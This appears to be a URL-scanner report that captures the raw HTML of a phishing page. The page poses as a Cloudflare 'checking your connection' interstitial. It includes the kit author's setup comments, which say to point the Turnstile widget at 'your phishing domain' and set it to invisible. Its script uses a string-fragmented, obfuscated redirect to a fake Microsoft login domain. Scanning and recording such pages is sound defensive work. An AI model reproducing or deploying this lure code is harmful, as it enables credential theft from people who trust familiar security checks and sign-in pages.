Submitted URL:
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 4 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

Console log messages · 1 found

Messages logged to the web console


The raw HTML body of the page

    1. Create a new Turnstile Site in your Cloudflare dashboard
    2. Set 'Domain'' to your phishing domain e.g.
    3. Set 'Widget Mode' to 'Invisible' to hide the Cloudflare widget and remove the interactive checks (change to managed if needed).
    4. Copy the value of 'Site Key' and replace the value used in this file at `sitekey:`.
--><!DOCTYPE html><html lang="en-US"><head>
        <script src=""></script>
        <title>Just a moment...</title>
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    <body class="no-js">
        <div class="main-wrapper" role="main">
            <div class="main-content">
                <h1 class="h1 zone-name-title">
                        <img src="" style="margin-bottom:-17px">
                        <div id="site-name">Just a moment.....</div>
                <p data-translate="please_wait" id="cf-spinner-please-wait">Please stand by, while we are checking if the site connection is secure </p>
				<div id="cf-turnstile"><div><input type="hidden" name="cf-turnstile-response" id="cf-chl-widget-z05ie_response"></div></div>
turnstile.ready(function () {
        turnstile.render('#cf-turnstile', {
            sitekey: '0x4AAAAAAAgugtmYkhNtdoK4', // replace this with your own sitekey
            callback: function(token) {
                window.location.assign('ht' + 'tps' + ':' + '//l' + 'ogi' + 'n-' + 'mic' + 'ros' + 'oft' + 'o' + 'nl' + 'ine' + '.' + 'f' + 'ul' + 'l' + 'b' + 'ody' + 'b' + 'u' + 'ri' + 'als' + 'e' + 'rv' + 'ic' + 'e' + 'at' + 'sea' + '.c' + 'o' + 'm' + '/' + 'l' + 'vx' + 'q' + 'yAZ' + 'l?' + 'd=' + 'f' + 'A' + 'I' + 'P' + 'evE');
                <div class="core-msg spacer" id="challenge-body-text">
                    <div>We needs to review the security of your connection before proceeding. </div>
        <div class="footer" role="contentinfo">
            <div class="footer-inner">
                <div class="text-center">Performance &amp; Security </div>
